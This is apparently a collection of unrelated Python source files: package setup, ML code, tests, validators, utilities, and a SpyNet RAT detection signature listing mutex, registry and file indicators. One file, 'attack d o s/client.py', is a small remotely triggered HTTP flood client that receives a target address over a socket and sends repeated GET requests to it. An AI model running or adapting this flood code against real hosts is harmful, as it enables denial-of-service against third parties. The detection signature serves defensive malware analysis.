this_directory = path.abspath(path.dirname(__file__))
with open(path.join(this_directory, "README.rst"), encoding="utf-8") as f:
long_description = f.read()
setup(
long_description=long_description,
long_description_content_type="text/x-rst",
url="https://github.com/gboehl/emcwrap",
name="emcwrap",
version="0.1.2",
author="<NAME>",
author_email="<EMAIL>",
description="Tools for Bayesian inference using Ensemble MCMC",
license="MIT",
classifiers=[
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.9",
],
include_package_data=True,
packages=find_packages(),
install_requires=[
"numpy",
"scipy",
"tqdm",
"emcee",
"pandas",
"numdifftools",
"matplotlib",
"grgrlib>=0.1.3",
],
)
| 1,003 |
AIDog/serving/test_client.py
|
BaranovArtyom/aiexamples
| 119 |
2173325
|
#!/usr/bin/env python
import argparse
import requests
import json
import tensorflow as tf
import numpy as np
import base64
def load_labels(label_file):
label = []
proto_as_ascii_lines = tf.gfile.GFile(label_file).readlines()
for l in proto_as_ascii_lines:
label.append(l.rstrip())
return label
if __name__ == "__main__":
file_name = "n02085620_199.png"
label_file = "dog_labels_inception_v3.txt"
model_name = "default"
model_version = 2
enable_ssl = False
parser = argparse.ArgumentParser()
parser.add_argument("--image", help="image to be processed")
parser.add_argument("--labels", help="name of file containing labels")
parser.add_argument("--model_name", help="name of predict model")
parser.add_argument("--model_version", type=int, help="version of predict model")
parser.add_argument("--enable_ssl", type=bool, help="if use https")
args = parser.parse_args()
if args.image:
file_name = args.image
if args.labels:
label_file = args.labels
    if args.model_name:
        model_name = args.model_name
    if args.model_version:
        model_version = args.model_version
if args.enable_ssl:
enable_ssl = args.enable_ssl
with open(file_name, "rb") as image_file:
encoded_string = str(base64.urlsafe_b64encode(image_file.read()), "utf-8")
if enable_ssl :
endpoint = "https://127.0.0.1:8500"
else:
endpoint = "http://127.0.0.1:8500"
json_data = {"model_name": model_name,
"model_version": model_version,
"data": {"image": encoded_string}
}
result = requests.post(endpoint, json=json_data)
res = np.array(json.loads(result.text)["prediction"][0])
print(res)
indexes = np.argsort(-res)
labels = load_labels(label_file)
top_k = 3
for i in range(top_k):
idx = indexes[i]
print(labels[idx], res[idx])
| 1,772 |
api/validators/regx/regex_user.py
|
oso1248/budAPI
| 0 |
2173230
|
import re
# Limits to 8 characters minimun, Uppercase, Lowercase, Number, Special Character [#?!@$%^&*-]
user_password_regex = re.compile(
r'^(?=.*?[A-Z])(?=.*?[a-z])(?=.*?[0-9])(?=.*?[#?!@$%^&*-]).{8,}$')
# Limits to list
user_role_regex = re.compile(
r'\b(Admin|Brew Master|Assist Brew Master|BPM|PE Brewhouse|PE Finishing|Maintenance|Material Handler|Lead Brewer|Brewer|Apprentice|Weekender|Seasonal)\b')
# Limits to FTC
user_brewery_regex = re.compile(
r'\b(FTC)\b')
# Limits to Alphanumeric characters, 5-50 characters in length
user_name_regex = re.compile(r'^[a-zA-Z0-9\x20]{5,50}$')
# Limits to Alphanumeric characters, 5-50 characters in length, no spaces
user_username_regex = re.compile(r'^[a-zA-Z0-9]{5,50}$')
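
# Quick sanity checks (illustrative; the sample strings are made up):
#
#   user_password_regex.match("Secret#123")    # matches: upper, lower, digit,
#                                              # special char, length >= 8
#   user_password_regex.match("password")      # None: no upper/digit/special
#   user_username_regex.match("user name")     # None: spaces are not allowed
#   user_name_regex.match("user name")         # matches: \x20 (space) is allowed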
| 741 |
tests/test_style.py
|
LaudateCorpus1/windlass
| 4 |
2170786
|
#
# (c) Copyright 2017 Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# Until PEP8 would become seprate test job this should permit running multiple
# tests at same time.
from flake8 import engine
from io import StringIO
import sys
import testtools
from testtools.matchers import Never
class Test_Style(testtools.TestCase):
def test_flake8(self):
try:
oldout = sys.stdout
sys.stdout = StringIO()
style_guide = engine.get_style_guide(exclude=['build'])
report = style_guide.check_files('.')
if report.total_errors > 0:
for line in sys.stdout.getvalue().split('\n'):
if line:
self.expectThat('', Never(), line)
finally:
sys.stdout = oldout
| 1,333 |
ride/BySykkelOnline.py
|
daria-for-origo/BySykkel
| 0 |
2173191
|
import traceback
from urllib.request import Request, urlopen
from ride.BySykkelError import print_exception, print_error
'''
https://oslobysykkel.no/apne-data/sanntid
Identification in the header
All requests to our real-time API should send the Client-Identifier header.
It should contain a value that describes the application calling the API.
The value should contain the name of your company/organisation,
followed by a dash and the name of the application,
e.g. mycompany-tripplanner or mycompany-citymonitor.
'''
def get_content(url, client_id):
if client_id == "":
print_error("Mandatory parameter Client-ID is missing")
return "{}"
if len(client_id) < 7:
print_error("Client-ID is too short")
return "{}"
try:
req = Request(url)
req.add_header('Client-Identifier', client_id)
return urlopen(req).read()
except Exception as ex:
ex.args += (url,)
print_exception(ex, traceback.format_exc())
return "{}"
| 1,005 |
model/architectures/losses.py
|
ratschlab/ncl
| 7 |
2173000
|
import gin
import tensorflow as tf
# NCE Contrastive Losses
@gin.configurable("momentum_NT_X")
def Momentum_NT_X(features, temperature=1.0):
q, queue = features
N = tf.shape(q)[0]
C = tf.shape(queue)[1]
k = queue[:N] # The first N elememts of the queue correspond to the positive views.
# Compute positives
l_pos = tf.matmul(tf.reshape(q, [N, 1, C]), tf.reshape(k, [N, C, 1]))
l_pos = tf.reshape(l_pos, [N, 1])
# Compute normalization
logits = tf.matmul(q, tf.transpose(queue))
labels = tf.range(N, dtype=tf.int32) # Meta-labels for the contrastive accuracy
expectations_marginal_per_sample = tf.reduce_logsumexp(logits / temperature, axis=1)
joint_expectation = tf.reduce_sum(l_pos, axis=1) / temperature
X_ent_per_sample = joint_expectation - expectations_marginal_per_sample
loss = - tf.reduce_mean(X_ent_per_sample, axis=0)
# Computing the contrastive accuracy
preds = tf.transpose(tf.argmax(tf.squeeze(logits), axis=1, output_type=tf.int32))
correct_preds = (preds == labels)
accuracy = tf.reduce_mean(tf.cast(tf.expand_dims(correct_preds, axis=0), tf.float32), axis=1)[0]
return loss, accuracy
@gin.configurable("momentum_neighbors_NT_X")
def Momentum_Neighbors_NT_X(features, n_labels_queues, temperature=1.0, alpha=0.5, neigh_func=gin.REQUIRED):
"""
Neighborhood contrastive loss used with Momentum queue as : https://arxiv.org/abs/1911.05722
Args:
features: Tuple of the form (projections, queue)
n_labels_queues: Tensor with matching labels to the momentum queue.
temperature: Float with temperature scaling parameter.
alpha: Float with trade-off parameter between inter and intra-neighborhood learning.
neigh_func: function used to define neigborhoods.
Returns:
loss: Global loss term.
aggregation_loss: Neighbors aggregation term.
disc_loss: Neighbors discrimation term.
accuracy: Contrastive accuracy.
"""
q, queue = features
N = tf.shape(q)[0]
C = tf.shape(queue)[1]
k = queue[:N]
n_l = n_labels_queues[:N]
# Compute true positives from view
local_pos = tf.matmul(tf.reshape(q, [N, 1, C]), tf.reshape(k, [N, C, 1]))
local_pos = tf.reshape(local_pos, [N, 1]) / temperature
local_labels = tf.range(N, dtype=tf.int32)
joint_expectation = tf.reduce_sum(local_pos, axis=1)
# Compute true normalization
logits = tf.matmul(q, tf.transpose(queue)) / temperature
expectations_marginal_per_sample = tf.reduce_logsumexp(logits, axis=1)
# Neighborhood terms
# Neighborhood positives for aggregation
neighbors_mask = neigh_func(n_l, n_labels_queues)
number_neigh = tf.reduce_sum(neighbors_mask, axis=1)
neighbors_expectation = tf.reduce_sum(logits * neighbors_mask, axis=1) / number_neigh
aggregation_loss = tf.reduce_mean(expectations_marginal_per_sample - neighbors_expectation)
# Neighborhood negatives for discrimination
expectations_neighborhood_per_sample = tf.math.log(
tf.reduce_sum(tf.math.exp(logits) * neighbors_mask, axis=1))
n_X_ent_per_sample = expectations_neighborhood_per_sample - joint_expectation
disc_loss = tf.reduce_mean(n_X_ent_per_sample)
loss = alpha * aggregation_loss + (1.0 - alpha) * disc_loss
# Computing the contrastive accuracy
preds = tf.transpose(tf.argmax(tf.squeeze(logits), axis=1, output_type=tf.int32))
correct_preds = (preds == local_labels)
accuracy = tf.reduce_mean(tf.cast(tf.expand_dims(correct_preds, axis=0), tf.float32))
return loss, aggregation_loss, disc_loss, accuracy
# Neighborhood Functions
@gin.configurable('get_neighbors_mask_temporal')
def get_neighbors_mask_temporal(samples, queue, threshold=8):
"""Neighborhood function to aggregate samples from same same patient with w hours.
Args:
samples: Tensor with samples labels (N, L).
queue: Tensor with queue labels (K, L).
threshold: Integer with max temporal distance between neighbors.
Returns:
Mask with the shape (N, K)
"""
N = samples.shape[0]
K = queue.shape[0]
a_n, a_t = tf.split(tf.tile(tf.reshape(samples, (N, 1, -1)), (1, K, 1)), 2, axis=-1)
b_n, b_t = tf.split(tf.tile(tf.reshape(queue, (1, K, -1)), (N, 1, 1)), 2, axis=-1)
t_n = a_n - b_n
t_t = tf.abs(a_t - b_t)
c = tf.math.logical_and((t_n == 0), (t_t <= threshold))
return tf.cast(c[:, :, 0], dtype=tf.float32)
@gin.configurable('get_neighbors_dt_multiclass')
def get_neighbors_dt_label_multiclass(samples, queue):
"""Neighborhood function to aggregate samples with same downstrean task label.
Args:
samples: Tensor with samples labels (N, L).
queue: Tensor with queue labels (K, L).
Returns:
Mask with the shape (N, K)
"""
N = samples.shape[0]
K = queue.shape[0]
a_n = tf.tile(tf.reshape(samples, (N, 1, -1)), (1, K, 1))
b_n = tf.tile(tf.reshape(queue, (1, K, -1)), (N, 1, 1))
t_n = a_n - b_n
c = tf.cast((t_n == 0), dtype=tf.float32)[:, :, 0] + tf.linalg.diag(tf.ones(N), num_rows=N, num_cols=K)
return tf.cast(c >= 1, dtype=tf.float32)
@gin.configurable('get_neighbors_nascl_label_multiclass')
def get_neighbors_nascl_label_multiclass(samples, queue, threshold=8, joint='intersection'):
"""Neighborhood function to aggregate samples from same patient with w hours and/or with same DT label.
Args:
samples: Tensor with samples labels (N, L).
queue: Tensor with queue labels (K, L).
threshold: Integer with max temporal distance between neighbors.
joint: String either 'intersection' or 'union' to determine how to aggregate the two neighborhoods.
Returns:
Mask with the shape (N, K)
"""
samples_dt, samples_patient = tf.split(samples, [1, 2], axis=-1)
queue_dt, queue_patient = tf.split(queue, [1, 2], axis=-1)
neigh_dt = get_neighbors_dt_label_multiclass(samples_dt, queue_dt)
neigh_patient = get_neighbors_mask_temporal(samples_patient, queue_patient, threshold=threshold)
if joint == 'intersection':
return neigh_dt * neigh_patient
elif joint == 'union':
return tf.cast((neigh_patient + neigh_dt >= 1), dtype=tf.float32)
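
# Smoke-test sketch (illustrative only; the batch size, queue length and feature
# dimension are arbitrary assumptions). The first N rows of the queue stand in
# for the positive views expected by Momentum_NT_X; here everything is random,
# so only shapes and the call signature are being exercised.
if __name__ == "__main__":
    N, K, C = 8, 64, 32
    q = tf.math.l2_normalize(tf.random.normal([N, C]), axis=1)
    queue = tf.math.l2_normalize(tf.random.normal([K, C]), axis=1)
    loss, accuracy = Momentum_NT_X((q, queue), temperature=0.1)
    print(float(loss), float(accuracy))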
| 6,271 |
celery/execute/__init__.py
|
amplify-education/celery
| 1 |
2173034
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from .. import current_app
from ..utils import deprecated
send_task = current_app.send_task
@deprecated(removal="2.3", alternative="Use task.apply_async() instead.")
def apply_async(task, *args, **kwargs):
"""*[Deprecated]* Use `task.apply_async()`"""
return task.apply_async(*args, **kwargs)
@deprecated(removal="2.3", alternative="Use task.apply() instead.")
def apply(task, *args, **kwargs):
"""*[Deprecated]* Use `task.apply()`"""
return task.apply(*args, **kwargs)
@deprecated(removal="2.3",
alternative="Use registry.tasks[name].delay instead.")
def delay_task(task, *args, **kwargs):
from ..registry import tasks
return tasks[task].apply_async(args, kwargs)
| 772 |
attack d o s/client.py
|
Marzooq13579/Hack-Gadgets
| 8 |
2172795
|
#-------------------------------------------------------------------------------
# Name: module1
# Purpose:
#
# Author: pat
#
# Created: 13/06/2013
# Copyright: (c) pat 2013
# Licence: <your licence>
#-------------------------------------------------------------------------------
import socket
import os
import re
host = ''
port = 1234
backlog = 5
size = 1024
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
s.listen(port)
while 1:
client, address = s.accept()
data = client.recv(size)
if data:
data3 = repr(data)
data2 = re.sub("b", "", data3)
data4 = re.sub("'", "", data2)
#print (data4) for debuuging
client.close()
def HTTPFlood():
#pid = os.fork()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock .connect((data4, 80))
sock.send("GET / HTTP/1.1\r\n")
sock.send("Host: localhost\r\n\r\n");
sock.close()
for i in range(1, 500):
HTTPFlood()
| 1,059 |
tests/test_environment_store.py
|
damycra/dj_secret_settings
| 1 |
2173177
|
from json.decoder import JSONDecodeError
from typing import Mapping, Sequence
from dj_secret_settings.settings_store import DoNotCoerceBool
import pytest
from os import environ
from dj_secret_settings.stores.from_environment import EnvironmentSettingsStore
@pytest.mark.parametrize(
["mocker", "data", "expected"],
[
("mocker", {"key": "foo"}, "foo"),
("mocker", {"key": "true"}, "true"),
("mocker", {"key": "false"}, "false"),
("mocker", {"key": "33"}, "33"),
],
indirect=["mocker"],
)
def test_value_returned_if_present(mocker, data, expected):
mocker.patch.dict(environ, data)
store = EnvironmentSettingsStore()
assert store.get_value("key") == expected
def test_none_returned_if_no_key_or_default(mocker):
mocker.patch.dict(environ, {"key": "foo"})
store = EnvironmentSettingsStore()
assert store.get_value("key2") is None
@pytest.mark.parametrize(
["mocker", "data", "expected"],
[
("mocker", {"key": "foo"}, "foo"),
("mocker", {"key": "bar", "k2": "foo"}, "bar"),
],
indirect=["mocker"],
)
def test_default_not_returned_if_present(mocker, data, expected):
mocker.patch.dict(environ, data)
store = EnvironmentSettingsStore()
assert store.get_value("key", "should not be returned") == expected
@pytest.mark.parametrize(
["mocker", "data"],
[
("mocker", {"key": "foo"}),
("mocker", {"key": "bar", "k2": "foo"}),
],
indirect=["mocker"],
)
def test_default_returned_if_not_present(mocker, data):
mocker.patch.dict(environ, data)
store = EnvironmentSettingsStore()
assert store.get_value("non-key", "dflt") == "dflt"
def test_bool_coerce_throws_error(mocker):
mocker.patch.dict(environ, {"key": "foo"})
store = EnvironmentSettingsStore()
with pytest.raises(DoNotCoerceBool):
store.get_value("key", coerce_type=bool)
@pytest.mark.parametrize(
["mocker", "data", "coerce", "expected"],
[
("mocker", {"key": "10"}, str, "10"),
("mocker", {"key": "11"}, int, 11),
("mocker", {"key": "list"}, list, ["l", "i", "s", "t"]),
],
indirect=["mocker"],
)
def test_coerce_works(mocker, data, coerce, expected):
mocker.patch.dict(environ, data)
store = EnvironmentSettingsStore()
assert store.get_value("key", coerce_type=coerce) == expected
@pytest.mark.parametrize(
["mocker", "data", "coerce"],
[
("mocker", {"key": "nan"}, int),
("mocker", {"key": "[1,2,3]"}, float),
],
indirect=["mocker"],
)
def test_coerce_throws_error(mocker, data, coerce):
mocker.patch.dict(environ, data)
store = EnvironmentSettingsStore()
with pytest.raises(Exception):
store.get_value("key", coerce_type=coerce)
@pytest.mark.parametrize(
["mocker", "data"],
[
("mocker", {"key": "true"}),
("mocker", {"key": "1"}),
("mocker", {"key": "on"}),
("mocker", {"key": "yes"}),
],
indirect=["mocker"],
)
def test_true_string_evaluates_true(mocker, data):
mocker.patch.dict(environ, data)
store = EnvironmentSettingsStore()
assert store.get_bool("key") == True
@pytest.mark.parametrize(
["mocker", "data"],
[
("mocker", {"key": "false"}),
("mocker", {"key": "0"}),
("mocker", {"key": "no"}),
("mocker", {"key": "off"}),
("mocker", {"key": "anything"}),
],
indirect=["mocker"],
)
def test_false_string_evaluates_false(mocker, data):
mocker.patch.dict(environ, data)
store = EnvironmentSettingsStore()
assert store.get_bool("key", default=True) == False
def test_map_returned(mocker):
mocker.patch.dict(environ, {"key": '{"map_key": 100}'})
store = EnvironmentSettingsStore()
value = store.get_mapping("key")
assert isinstance(value, Mapping)
assert value["map_key"] == 100
def test_missing_map_key_returns_none():
store = EnvironmentSettingsStore()
assert store.get_mapping("non-key") is None
def test_non_map_default_raises_error():
store = EnvironmentSettingsStore()
with pytest.raises(TypeError):
store.get_mapping("key", [1, 2, 3])
def test_non_mapping_raises_error(mocker):
mocker.patch.dict(environ, {"key": "text"})
store = EnvironmentSettingsStore()
with pytest.raises((TypeError, JSONDecodeError)):
store.get_mapping("key")
def test_list_returned(mocker):
mocker.patch.dict(environ, {"key": "[1,2,3]"})
store = EnvironmentSettingsStore()
value = store.get_array("key")
assert isinstance(value, Sequence)
assert value[1] == 2
def test_missing_list_key_returns_none():
store = EnvironmentSettingsStore()
assert store.get_array("non-key") is None
def test_non_list_default_raises_error():
store = EnvironmentSettingsStore()
with pytest.raises(TypeError):
store.get_array("key", "non list")
@pytest.mark.parametrize(
["mocker", "data"],
[
("mocker", {"key": "text"}),
("mocker", {"key": "{}"}),
],
indirect=["mocker"],
)
def test_non_array_raises_error(mocker, data):
mocker.patch.dict(environ, data)
store = EnvironmentSettingsStore()
with pytest.raises((TypeError, JSONDecodeError)):
store.get_array("key")
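# Illustrative usage sketch (an assumption drawn from the behaviour the tests
# above exercise, not part of the test module; "TIMEOUT"/"DEBUG"/"FLAGS" are
# hypothetical variable names):
#
#   environ["TIMEOUT"] = "30"
#   environ["DEBUG"] = "yes"
#   environ["FLAGS"] = '{"beta": true}'
#   store = EnvironmentSettingsStore()
#   store.get_value("TIMEOUT", coerce_type=int)   # -> 30
#   store.get_bool("DEBUG")                       # -> True ("yes"/"on"/"1"/"true")
#   store.get_mapping("FLAGS")["beta"]            # -> True (JSON-decoded mapping)
#   store.get_value("MISSING", "fallback")        # -> "fallback"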
| 5,279 |
selenium_tests/broken_image_check.py
|
WesleyHindle/the-internet
| 0 |
2171355
|
from selenium import webdriver #Libraries needed
from selenium.webdriver.common.keys import Keys #This gives you access to special keys so you can use things like the Esc or Return key. This is different to being able to type.
import time #Here we use this to delay selenium from executing by the number of seconds specified.
import requests #This allows us to send requests to URLs
#from requests.exceptions import MissingSchema, InvalidSchema, InvalidURL
driver = webdriver.Chrome("/Users/Student/Downloads/chromedriver")
# driver.get("http://the-internet.herokuapp.com/broken_images")
# image_list = driver.find_element_by_xpath('/html/body/div[2]/div/div/img[1]') #You're selecting specifically which image you want to check if it's broken or not
# response = requests.get(image_list.get_attribute('src'), stream=True) #This checks the url of the image
# if (response.status_code != 200): #If the response code for the image is NOT 200 then the image is broken. Other issues could cause it not to display though.
# print("Image is broken")
# driver.quit()
#########################
###Searching through all images on a page
driver.get("http://the-internet.herokuapp.com/broken_images")
iBrokenImageCount = 0
image_list = driver.find_elements_by_tag_name("img") #This finds every image on the page and stores it in a list
print('Total number of images on the page is ' + str(len(image_list))) #Just for demo purposes
for img in image_list: #Searches through each image in the list
response = requests.get(img.get_attribute('src'), stream=True) #src holds the URL the image is stored on
if (response.status_code != 200): #This URL is then checked for its status code.
print(img.get_attribute('outerHTML') + " is broken.")
iBrokenImageCount = (iBrokenImageCount + 1)
print(f"The number of broken images is {iBrokenImageCount}")
| 1,940 |
insights/parsers/tests/test_sysconfig_docker.py
|
mglantz/insights-core
| 121 |
2173267
|
from insights.parsers.sysconfig import DockerSysconfig
from insights.tests import context_wrap
DOCKER_SYSCONFIG_STD = """
# /etc/sysconfig/docker
# Modify these options if you want to change the way the docker daemon runs
OPTIONS='--selinux-enabled'
DOCKER_CERT_PATH=/etc/docker
# If you want to add your own registry to be used for docker search and docker
# pull use the ADD_REGISTRY option to list a set of registries, each prepended
# with --add-registry flag. The first registry added will be the first registry
# searched.
ADD_REGISTRY='--add-registry registry.access.redhat.com'
# If you want to block registries from being used, uncomment the BLOCK_REGISTRY
# option and give it a set of registries, each prepended with --block-registry
# flag. For example adding docker.io will stop users from downloading images
# from docker.io
# BLOCK_REGISTRY='--block-registry'
# If you have a registry secured with https but do not have proper certs
# distributed, you can tell docker to not look for full authorization by
# adding the registry to the INSECURE_REGISTRY line and uncommenting it.
# INSECURE_REGISTRY='--insecure-registry'
# On an SELinux system, if you remove the --selinux-enabled option, you
# also need to turn on the docker_transition_unconfined boolean.
# setsebool -P docker_transition_unconfined 1
# Location used for temporary files, such as those created by
# docker load and build operations. Default is /var/lib/docker/tmp
# Can be overriden by setting the following environment variable.
# DOCKER_TMPDIR=/var/tmp
# Controls the /etc/cron.daily/docker-logrotate cron job status.
# To disable, uncomment the line below.
# LOGROTATE=false
"""
def test_standard_content():
context = context_wrap(DOCKER_SYSCONFIG_STD, 'etc/sysconfig/docker')
sysconf = DockerSysconfig(context)
assert sorted(sysconf.keys()) == sorted(['OPTIONS', 'DOCKER_CERT_PATH', 'ADD_REGISTRY'])
assert 'OPTIONS' in sysconf
assert sysconf['OPTIONS'] == '--selinux-enabled'
assert sysconf.options == '--selinux-enabled'
assert 'DOCKER_CERT_PATH' in sysconf
assert sysconf['DOCKER_CERT_PATH'] == '/etc/docker'
assert 'ADD_REGISTRY' in sysconf
assert sysconf['ADD_REGISTRY'] == '--add-registry registry.access.redhat.com'
assert sysconf.unparsed_lines == []
| 2,303 |
bellparallel/bellparallel/__init__.py
|
FabianBell/Packages
| 0 |
2172395
|
from multiprocessing import Pool
from multiprocessing import current_process
from tqdm import tqdm
from functools import wraps
import ctypes
CNX_INDI = '_cnx_'
def _exe_function(entry):
adress, data = entry
func = ctypes.cast(adress, ctypes.py_object).value
if isinstance(data, tuple) and len(data) == 2 and isinstance(data[0], str) and data[0] == CNX_INDI and isinstance(data[1], tuple):
adress, data = data[1]
cnx = ctypes.cast(adress, ctypes.py_object).value
return func(cnx, data)
return func(data)
def _pack(address):
"""
Adds the memory address to the data entry
"""
def _pack_entry(entry):
return address, entry
return _pack_entry
def parallel(nproz=4, tag=None):
"""
Function wrapper to run the function code on each
element of the input list in parallel.
"""
def run_parallel(func):
@wraps(func)
def run(*data, length=None):
if len(data) == 1:
data = data[0]
elif len(data) == 2 and func.__name__ != func.__qualname__:
# requires context
address = id(data[0])
# set length since we want to use generator
length = len(data[1]) if length is None else length
data = map(_pack(address), data[1])
# add context indicator
data = map(_pack(CNX_INDI), data)
else:
raise ValueError('Invalid function specification or arguments')
address = id(func)
iterator = map(_pack(address), data)
with Pool(nproz) as pool:
length = len(data) if length is None else length
res = list(tqdm(
pool.imap(_exe_function, iterator),
total=length,
desc=tag
))
return res
return run
return run_parallel
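# Minimal usage sketch (an assumption, not shipped with the package). It relies
# on a fork-based multiprocessing start method, because worker processes resolve
# the target function from its memory address via ctypes.
if __name__ == "__main__":

    @parallel(nproz=2, tag="squares")
    def square(x):
        # runs in a worker process for each element of the input list
        return x * x

    print(square([1, 2, 3, 4]))  # -> [1, 4, 9, 16], with a tqdm progress bar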
| 1,939 |
modules/signatures/windows/rat_spynet.py
|
Yuanmessi/Bold-Falcon
| 24 |
2172939
|
# Copyright (C) 2014 @threatlead
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from lib.cuckoo.common.abstracts import Signature
class SpynetRat(Signature):
name = "rat_spynet"
description = "Creates known SpyNet files, registry changes and/or mutexes."
severity = 3
categories = ["rat"]
families = ["spynet"]
authors = ["threatlead", "nex", "RedSocks"]
minimum = "2.0"
references = [
"https://malwr.com/analysis/ZDQ1NjBhNWIzNTdkNDRhNjhkZTFmZTBkYTU2YjMwNzg/",
"https://malwr.com/analysis/MjkxYmE2YzczNzcwNGJiZjljNDcwMzA2ZDkyNDU2Y2M/",
"https://malwr.com/analysis/N2E3NWRiNDMyYjIwNGE0NTk3Y2E5NWMzN2UwZTVjMzI/",
"https://malwr.com/analysis/N2Q2NWY0Y2MzOTM0NDEzNmE1MTdhOThiNTQxMzhiNzk/",
]
mutexes_re = [
".*CYBERGATEUPDATE",
".*\(\(SpyNet\)\).*",
".*Spy-Net.*",
".*Spy.*Net.*Instalar",
".*Spy.*Net.*Persist",
".*Spy.*Net.*Sair",
".*X_PASSWORDLIST_X.*",
".*X_BLOCKMOUSE_X.*",
# ".*PERSIST", # Causes false positive detection on XtremeRAT samples.
".*_SAIR",
".*SPY_NET_RATMUTEX",
".*xXx.*key.*xXx",
".*Administrator15",
".*Caracas",
".*Caracas_PERSIST",
".*Pluguin",
".*Pluguin_PERSIST",
".*Pluguin_SAIR",
".*MUT1EX.*",
]
regkeys_re = [
".*\\SpyNet\\.*",
]
files_re = [
".*XX--XX--XX.txt",
".*\\\\Spy-Net\\\\server.exe",
".*\\\\Spy-Net\\\\Spy-Net.dll",
".*\\\\Spy-Net\\\\keylog.dat",
".*\\\\Spy-Net",
]
def on_complete(self):
for indicator in self.mutexes_re:
mutex = self.check_mutex(pattern=indicator, regex=True)
if mutex:
self.mark_ioc("mutex", mutex)
for indicator in self.regkeys_re:
regkey = self.check_key(pattern=indicator, regex=True)
if regkey:
self.mark_ioc("registry", regkey)
for indicator in self.files_re:
regkey = self.check_file(pattern=indicator, regex=True)
if regkey:
self.mark_ioc("file", regkey)
return self.has_marks()
| 2,789 |
pipeline/Step1/pd_forward_bert.py
|
JunnYu/BERT-SST2-Prod
| 1 |
2172740
|
import numpy as np
import paddle
from paddlenlp.transformers import BertForSequenceClassification
from reprod_log import ReprodLogger
if __name__ == "__main__":
paddle.set_device("cpu")
# def logger
reprod_logger = ReprodLogger()
model = BertForSequenceClassification.from_pretrained(
"bert-base-uncased", num_classes=2)
classifier_weights = paddle.load(
"../classifier_weights/paddle_classifier_weights.bin")
model.load_dict(classifier_weights)
model.eval()
# read or gen fake data
fake_data = np.load("../fake_data/fake_data.npy")
fake_data = paddle.to_tensor(fake_data)
# forward
out = model(fake_data)
#
reprod_logger.add("logits", out.cpu().detach().numpy())
reprod_logger.save("forward_paddle.npy")
| 784 |
bin/generate_isoforms_fusion_FDR.py
|
gaofeng21cn/IDP-fusion
| 4 |
2172811
|
#!/usr/bin/python
import sys
import re
import string
#from constants import *
### Store fusion gene information from MLE input file
#########
def get_fusion_genomes(input_filename, isoforms_name_filename):
MLE_input_dict = dict()
isoforms_names_ls = []
isoforms_single_names_ls = []
isoforms_name_file = open(isoforms_name_filename, 'r')
for line in isoforms_name_file:
if ("/" in line):
isoforms_single_names_ls += line.strip().split("/")
isoforms_names_ls.append(line.strip())
isoforms_name_file.close()
num_reads = 0
input_file = open(input_filename, 'r')
line_index = 0;
wr_flag = False
for line in input_file:
fields = line.split()
if (line_index == 0):
gname = fields[0]
num_isoforms = int(fields[1])
rname = fields[2]
prev_line = line
elif (line_index == 1):
for isoform in line.strip().split():
if (isoform in isoforms_names_ls):
MLE_input_dict[gname] = []
MLE_input_dict[gname].append(prev_line)
wr_flag = True
break
line_index += 1
if (wr_flag):
MLE_input_dict[gname].append(line.strip())
if (line_index == (9 + num_isoforms)):
line_index = 0
wr_flag = False
input_file.close()
# Keep region with supporting isoforms
gnames = MLE_input_dict.keys()
for gname in gnames:
isoforms_ls = MLE_input_dict[gname][1].strip().split()
isoforms_flag_ls = [(i in isoforms_names_ls) for i in isoforms_ls]
num_isoforms = len(isoforms_ls)
num_regions = len(MLE_input_dict[gname][6].strip().split())
regions_flag_ls = [0] * num_regions
for isoform_idx in range(num_isoforms):
if (isoforms_flag_ls[isoform_idx]):
line_ls = [int(i) for i in MLE_input_dict[gname][7 + isoform_idx].strip().split()]
regions_flag_ls = [regions_flag_ls[i] + line_ls[i] for i in range(num_regions)]
for line_idx in [6, 8 + isoform_idx, 9 + isoform_idx]:
line_ls = MLE_input_dict[gname][line_idx].strip().split()
new_line_ls = [line_ls[i] for i in range(num_regions) if regions_flag_ls[i] > 0]
MLE_input_dict[gname][line_idx] = "\t".join(new_line_ls)
# Update region columns
for isoform_idx in range(num_isoforms-1, -1, -1):
if (isoforms_flag_ls[isoform_idx]):
line_ls = MLE_input_dict[gname][7 + isoform_idx].strip().split()
new_line_ls = [line_ls[i] for i in range(num_regions) if regions_flag_ls[i] > 0]
MLE_input_dict[gname][7 + isoform_idx] = "\t".join(new_line_ls)
else:
del MLE_input_dict[gname][7 + isoform_idx]
# Update list of isoforms
isoforms_ls = MLE_input_dict[gname][1].strip().split()
for line_idx in [1, 2, 3]:
line_ls = MLE_input_dict[gname][line_idx].strip().split()
new_line_ls = [line_ls[i] for i in range(num_isoforms) if isoforms_ls[i] in isoforms_names_ls]
MLE_input_dict[gname][line_idx] = "\t".join(new_line_ls)
# Update number of isoforms
line_ls = MLE_input_dict[gname][0].strip().split()
line_ls[1] = str(sum(isoforms_flag_ls))
MLE_input_dict[gname][0] = "\t".join(line_ls)
num_reads_ls = [int(i) for i in MLE_input_dict[gname][-1].strip().split()]
num_reads += sum(num_reads_ls)
return [MLE_input_dict, isoforms_single_names_ls, num_reads]
def print_MLE_input_file(input_filename, output_filename,
isoforms_names_filename, MLE_input_dict, num_reads):
input_file = open(input_filename, 'r')
output_file = open(output_filename, 'w')
num_reads_origin = int(input_file.readline())
output_file.write(str(num_reads_origin + num_reads) + "\n")
for line in input_file:
output_file.write(line)
fusion_gene_names_ls = MLE_input_dict.keys()
for fusion_gname in fusion_gene_names_ls:
for fusion_line in MLE_input_dict[fusion_gname]:
output_file.write(fusion_line.strip() + '\n')
input_file.close()
output_file.close()
def print_predicted_gpd_file(input_gpd_filename, output_gpd_filename, isoforms_names_ls):
